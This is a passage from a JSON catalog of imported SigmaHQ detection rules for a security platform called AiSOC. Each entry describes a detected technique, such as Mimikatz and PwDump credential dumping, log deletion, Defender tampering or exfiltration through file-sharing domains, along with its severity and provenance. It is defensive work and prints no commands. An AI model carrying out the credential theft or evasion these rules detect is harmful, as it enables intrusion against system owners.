"detections/sigma-imports/_quarantine/backup-files-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "06125661-3814-4e03-bfa2-1e4411c60ac3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_delete_backup_file.yml" } }, { "id": "sigmahq-sigma-0649be4a-aeb0-45b0-b89e-7f1668f6d9c0", "type": "detection", "name": "IIS WebServer Log Deletion via CommandLine Utilities", "description": "Detects attempts to delete Internet Information Services (IIS) log files via command line utilities, which is a common defense evasion technique used by attackers to cover their tracks.\nThreat actors often abuse vulnerabilities in web applications hosted on IIS servers to gain initial access and later delete IIS logs to evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/iis-webserver-log-deletion-via-commandline-utilities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0649be4a-aeb0-45b0-b89e-7f1668f6d9c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_iis_logs_deletion.yml" } }, { "id": "sigmahq-sigma-065b00ca-5d5c-4557-ac95-64a6d0b64d86", "type": "detection", "name": "Remote Access Tool - Anydesk Execution From Suspicious Folder", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-anydesk-execution-from-suspicious-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" } }, { "id": "sigmahq-sigma-065cceea-77ec-4030-9052-fc0affea7110", "type": "detection", "name": "DNS Query for Anonfiles.com Domain - Sysmon", "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-for-anonfiles-com-domain-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "065cceea-77ec-4030-9052-fc0affea7110", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_anonymfiles_com.yml" } }, { "id": "sigmahq-sigma-067d8238-7127-451c-a9ec-fa78045b618b", "type": "detection", "name": "Linux Doas Tool Execution", "description": "Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/linux-doas-tool-execution.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "067d8238-7127-451c-a9ec-fa78045b618b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_doas_execution.yml" } }, { "id": "sigmahq-sigma-0685b176-c816-4837-8e7b-1216f346636b", "type": "detection", "name": "HackTool - Quarks PwDump Execution", "description": "Detects usage of the Quarks PwDump tool via commandline arguments", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-quarks-pwdump-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0685b176-c816-4837-8e7b-1216f346636b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_quarks_pwdump.yml" } }, { "id": "sigmahq-sigma-06b401f4-107c-4ff9-947f-9ec1e7649f1e", "type": "detection", "name": "Potential Arbitrary Command Execution Via FTP.EXE", "description": "Detects execution of \"ftp.exe\" script with the \"-s\" or \"/s\" flag and any child processes ran by \"ftp.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-arbitrary-command-execution-via-ftp-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ftp_arbitrary_command_execution.yml" } }, { "id": "sigmahq-sigma-06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", "type": "detection", "name": "WMIC Loading Scripting Libraries", "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).\nIt could be an indicator of SquiblyTwo technique, which uses Windows Management Instrumentation (WMI) to execute malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1220" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmic-loading-scripting-libraries.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml" } }, { "id": "sigmahq-sigma-06d71506-7beb-4f22-8888-e2e5e2ca7fd8", "type": "detection", "name": "Mimikatz Use", "description": "This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002", "T1003.004", "T1003.001", "T1003.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mimikatz-use.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "06d71506-7beb-4f22-8888-e2e5e2ca7fd8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/win_alert_mimikatz_keywords.yml" } }, { "id": "sigmahq-sigma-0718cd72-f316-4aa2-988f-838ea8533277", "type": "detection", "name": "Suspicious Start-Process PassThru", "description": "Powershell use PassThru option to start in background", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-start-process-passthru.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0718cd72-f316-4aa2-988f-838ea8533277", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml" } }, { "id": "sigmahq-sigma-071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed", "type": "detection", "name": "Possible Coin Miner CPU Priority Param", "description": "Detects command line parameter very often used with coin miners", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/possible-coin-miner-cpu-priority-param.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_coinminer.yml" } }, { "id": "sigmahq-sigma-07330162-dba1-4746-8121-a9647d49d297", "type": "detection", "name": "AWS Config Disabling Channel/Recorder", "description": "Detects AWS Config Service disabling", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-config-disabling-channel-recorder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "07330162-dba1-4746-8121-a9647d49d297", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_config_disable_recording.yml" } }, { "id": "sigmahq-sigma-074e0ded-6ced-4ebd-8b4d-53f55908119d", "type": "detection", "name": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl", "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/awl-bypass-with-winrm-vbs-and-malicious-wsmpty-xsl-wsmtxt-xsl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "074e0ded-6ced-4ebd-8b4d-53f55908119d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml" } }, { "id": "sigmahq-sigma-076ebe48-cc05-4d8f-9d41-89245cd93a14", "type": "detection", "name": "Remote Access Tool - ScreenConnect Command Execution", "description": "Detects command execution via ScreenConnect RMM", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-screenconnect-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "076ebe48-cc05-4d8f-9d41-89245cd93a14", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml" } }, { "id": "sigmahq-sigma-07743f65-7ec9-404a-a519-913db7118a8d", "type": "detection", "name": "COM Hijack via Sdclt", "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546", "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/com-hijack-via-sdclt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "07743f65-7ec9-404a-a519-913db7118a8d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml" } }, { "id": "sigmahq-sigma-07837ab9-60e1-481f-a74d-c31fb496a94c", "type": "detection", "name": "Network Communication Initiated To Portmap.IO Domain", "description": "Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1041", "T1090.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-communication-initiated-to-portmap-io-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "07837ab9-60e1-481f-a74d-c31fb496a94c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_portmap.yml" } }, { "id": "sigmahq-sigma-07a99744-56ac-40d2-97b7-2095967b0e03", "type": "detection", "name": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-privilege-escalation-attempt-via-exe-local-technique.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "07a99744-56ac-40d2-97b7-2095967b0e03", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml" } }, { "id": "sigmahq-sigma-07aa184a-870d-413d-893a-157f317f6f58", "type": "detection", "name": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1615", "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-reconnaissance-activity-via-gathernetworkinfo-vbs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "07aa184a-870d-413d-893a-157f317f6f58", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_gather_network_info_execution.yml" } }, { "id": "sigmahq-sigma-07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "type": "detection", "name": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-mshta-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml" } }, { "id": "sigmahq-sigma-07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", "type": "detection", "name": "Terminal Server Client Connection History Cleared - Registry", "description": "Detects the deletion of registry keys containing the MSTSC connection history", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/terminal-server-client-connection-history-cleared-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml" } }, { "id": "sigmahq-sigma-07e3cb2c-0608-410d-be4b-1511cb1a0448", "type": "detection", "name": "Tamper Windows Defender Remove-MpPreference", "description": "Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/tamper-windows-defender-remove-mppreference.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_remove_mppreference.yml" } }, { "id": "sigmahq-sigma-07e97cc6-aed1-43ae-9081-b3470d2367f1", "type": "detection", "name": "Okta Suspicious Activity Reported by End-user", "description": "Detects when an Okta end-user reports activity by their account as being potentially suspicious.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-suspicious-activity-reported-by-end-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "07e97cc6-aed1-43ae-9081-b3470d2367f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_suspicious_activity_enduser_report.yml" } }, { "id": "sigmahq-sigma-07f8bdc2-c9b3-472a-9817-5a670b872f53", "type": "detection", "name": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", "description": "Detects usage of cmdkey to look for cached credentials on the system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-reconnaissance-for-cached-credentials-via-cmdkey-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml" } }, { "id": "sigmahq-sigma-08200f85-2678-463e-9c32-88dce2f073d1", "type": "detection", "name": "MSSQL Add Account To Sysadmin Role", "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mssql-add-account-to-sysadmin-role.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "08200f85-2678-463e-9c32-88dce2f073d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml" } }, { "id": "sigmahq-sigma-08249dc0-a28d-4555-8ba5-9255a198e08c", "type": "detection", "name": "Local Network Connection Initiated By Script Interpreter", "description": "Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/local-network-connection-initiated-by-script-interpreter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "08249dc0-a28d-4555-8ba5-9255a198e08c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_wscript_cscript_local_connection.yml" } }, { "id": "sigmahq-sigma-086ae989-9ca6-4fe7-895a-759c5544f247", "type": "detection", "name": "Potential Persistence Via TypedPaths", "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-typedpaths.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "086ae989-9ca6-4fe7-895a-759c5544f247", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml" } }, { "id": "sigmahq-sigma-087790e3-3287-436c-bccf-cbd0184a7db1", "type": "detection", "name": "Potential CommandLine Path Traversal Via Cmd.EXE", "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-commandline-path-traversal-via-cmd-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "087790e3-3287-436c-bccf-cbd0184a7db1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_path_traversal.yml" } }, { "id": "sigmahq-sigma-0877ed01-da46-4c49-8476-d49cdd80dfa7", "type": "detection", "name": "Screen Capture - macOS", "description": "Detects attempts to use screencapture to collect macOS screenshots", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/screen-capture-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0877ed01-da46-4c49-8476-d49cdd80dfa7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_screencapture.yml" } }, { "id": "sigmahq-sigma-089dbdf6-b960-4bcc-90e3-ffc3480c20f6", "type": "detection", "name": "File and Directory Discovery - MacOS", "description": "Detects usage of system utilities to discover files and directories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-and-directory-discovery-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "089dbdf6-b960-4bcc-90e3-ffc3480c20f6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml" } }, { "id": "sigmahq-sigma-089fc3d2-71e8-4763-a8a5-c97fbb0a403e", "type": "detection", "name": "Regsvr32 DLL Execution With Suspicious File Extension", "description": "Detects the execution of REGSVR32.exe with DLL files masquerading as other files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/regsvr32-dll-execution-with-suspicious-file-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regsvr32_susp_extensions.yml" } }, { "id": "sigmahq-sigma-08d6ac24-c927-4469-b3b7-2e422d6e3c43", "type": "detection", "name": "Azure Kubernetes Network Policy Change", "description": "Identifies when a Azure Kubernetes network policy is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1496", "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-kubernetes-network-policy-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "08d6ac24-c927-4469-b3b7-2e422d6e3c43", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_kubernetes_network_policy_change.yml" } }, { "id": 